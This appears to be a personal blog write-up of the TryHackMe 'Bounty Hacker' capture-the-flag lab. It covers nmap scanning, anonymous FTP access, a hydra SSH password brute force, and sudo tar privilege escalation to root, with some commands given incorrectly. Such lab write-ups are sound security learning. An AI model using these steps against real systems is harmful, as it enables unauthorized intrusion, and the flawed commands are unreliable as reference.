TryHackMe Write-Up (Bounty Hunther)
In this Capture the flag event we have a few tasks in 1 target.
Like always, we start with only an IP address 10.10.6.212
Flags to capture are
-Who wrote this task list
-What service can we brute force
-What is the user's password
-What are the flags for the txt files of user.txt and root.tx
The first step I did was to conduct an NMAP scan to see what ports are available from the target.
> nmap -sS -sC -Pn -oN bounty.txt 10.10.6.212
I can see a few ports are open
Port 21 is a TCP port running a login connection to an FTP server
Port 22 is a TCP port running SSH
Port 80 is a TCP port running http - a web server
Let's do some basic research and look up the Target’s IP on a web browser as we can see it has an HTTP port open
> web search of 10.10.6.212
We see a web page displayed
- No clues. I did not find anything within the page source either.
With our NMAP report, we see that port 21 is an FTP login port. So let's try and log on. You can see the username of anonymous!
> ftp 10.10.6.212
When prompted for a login, we type the name:
And we are logged in! There was no password required. A perfect example of an unsecured port and service!
Within the user's account, we can see some basic files that they have access to!
Locks.txt and tasks.txt. A simple command will allow us to grab that information and bring it to our account.
> grep locks.txt
> grep tasks.txt
Once the files are downloaded, let's view them and see what we have obtained
> cat locks.txt
> cat task.txt
Looks like passwords to me! Within locks.txt
And we see a username within task.txt
Our first flag is acquired! The name of the user who made the file task.txt! Let's continue
-So far, have a (port22) SSH that can be brute forced! SSH is a secure shell and allows access to the network or system if you have the correct information
-We also have a file of passwords
-And we have a password
Another flag was what service can be brute forced. SSH of course :)
So let's try and use a brute force method called hydra. Hydra is preinstalled on the linux system we are using. So we simply have to use the hydra command along with the username and what file we want to use against the target IP address. The example is below
> hydra -l lin -p locks.txt 10.10.6.212
We got in! Hydra ran those passwords against the username until we gained the password needed for the target.
Another flag was obtained. We can see all the information needed for lin’s login
So lets SSH into lin
> ssh lin@10.10.6.212
> insert the password we acquired from the hydra attack
And we are in! A simple > whoami command confirms this.
Let's poke around for a bit
> pwd tells us where we are at
> ls tells us what is inside and ls -a tells us everything thats inside including hidden info
Cool! We see a file user.txt lets open it up!
> cat user.txt
And we have a flag!!!
Fun right?
So now we need root access!
The root is the king of the castle. Knows all and makes all the decisions!
So, let's move over to the root account
> cd root
Cd is change directory
There is a root!!!
But we have no access and it asks for a password!
I used a sudo command to view the possible commands that lin could run
> sudo -l
and I was able to see that lin may run commands on Bounty hacker of /bin/tar to access the root
What is amazing about capturing the flag events, is that I learn a new tool every time.
I was able to find a curated list of Unix binaries that can be used to bypass local security restrictions.
this is all publicly available online and was found on GTFObins
Within this website, I searched tar and was able to find a sudo Function for tar I was able to use the publicly available information to then put into my terminal To then get privileges of root
within root, I use a simple ls -a (list all) command to find the root file
within this root file, I found our last THM flag.
This Capture the Flag event was significant to me because it showed me how the severity of an unsecured port along with weak login information can play a key role into a vulnerable Network. and this isn't even to mention the unencrypted passwords that were located inside a file. Simple security practices can be implemented into many types of servers. the importance of vulnerability scanning regularly along with the implementation of security protocols is Paramount
Post a comment